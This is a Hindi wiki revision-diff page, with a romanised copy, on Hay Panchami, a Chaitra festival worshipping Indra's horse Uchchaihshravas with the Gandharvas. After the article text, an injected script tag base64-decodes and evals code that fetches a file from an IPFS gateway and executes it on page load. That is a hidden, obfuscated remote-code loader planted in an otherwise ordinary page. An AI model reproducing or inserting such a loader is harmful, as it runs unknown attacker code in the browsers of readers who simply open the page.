Difference between revisions of "हय पंचमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*[[चैत्र]] [[शुक्ल पक्ष]] की [[पंचमी]] को [[इन्द्र]] का [[अश्व]] [[उच्चै:श्रवा]] समुद्र से प्रकट हुआ था, अत: उस दिन उसकी पूजा [[गन्धर्व|गन्धर्वों]] ([[चित्ररथ]], [[चित्रसेन]] आदि) के साथ की जाती है, क्योंकि वे उसके बन्धु कहे गये हैं।
+
*[[चैत्र]] [[शुक्ल पक्ष]] की [[पंचमी]] को [[इन्द्र]] का अश्व [[उच्चै:श्रवा]] समुद्र से प्रकट हुआ था, अत: उस दिन उसकी पूजा [[गन्धर्व|गन्धर्वों]] ([[चित्ररथ]], [[चित्रसेन]] आदि) के साथ की जाती है, क्योंकि वे उसके बन्धु कहे गये हैं।
 
*हयपंचमी की पूजा में संगीत, मिठाइयों, पोलिकाओं, दही, गुड़, दूध, चावल के आटे का प्रयोग किया जाता है।
 
*हयपंचमी की पूजा में संगीत, मिठाइयों, पोलिकाओं, दही, गुड़, दूध, चावल के आटे का प्रयोग किया जाता है।
 
*इससे दीर्घ आयु, [[स्वास्थ्य]], [[युद्ध]] में विजय की प्राप्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 1, 573, शालिहोत्र से उद्धरण); स्मृतिकौस्तुभ (92</ref>
 
*इससे दीर्घ आयु, [[स्वास्थ्य]], [[युद्ध]] में विजय की प्राप्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 1, 573, शालिहोत्र से उद्धरण); स्मृतिकौस्तुभ (92</ref>

Latest revision as of 13:31, 4 April 2013

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl paksh ki panchami ko indr ka ashv uchchai:shrava samudr se prakat hua tha, at: us din usaki pooja gandharvoan (chitrarath, chitrasen adi) ke sath ki jati hai, kyoanki ve usake bandhu kahe gaye haian.
  • hayapanchami ki pooja mean sangit, mithaiyoan, polikaoan, dahi, gu d, doodh, chaval ke ate ka prayog kiya jata hai.
  • isase dirgh ayu, svasthy, yuddh mean vijay ki prapti hoti hai.[1]
  • is matsyajayanti bhi kaha gaya hai.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hemadri (vrat khand 1, 573, shalihotr se uddharan); smritikaustubh (92
  2. ahalyakamadhenu (pandulipi, 360 bi

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>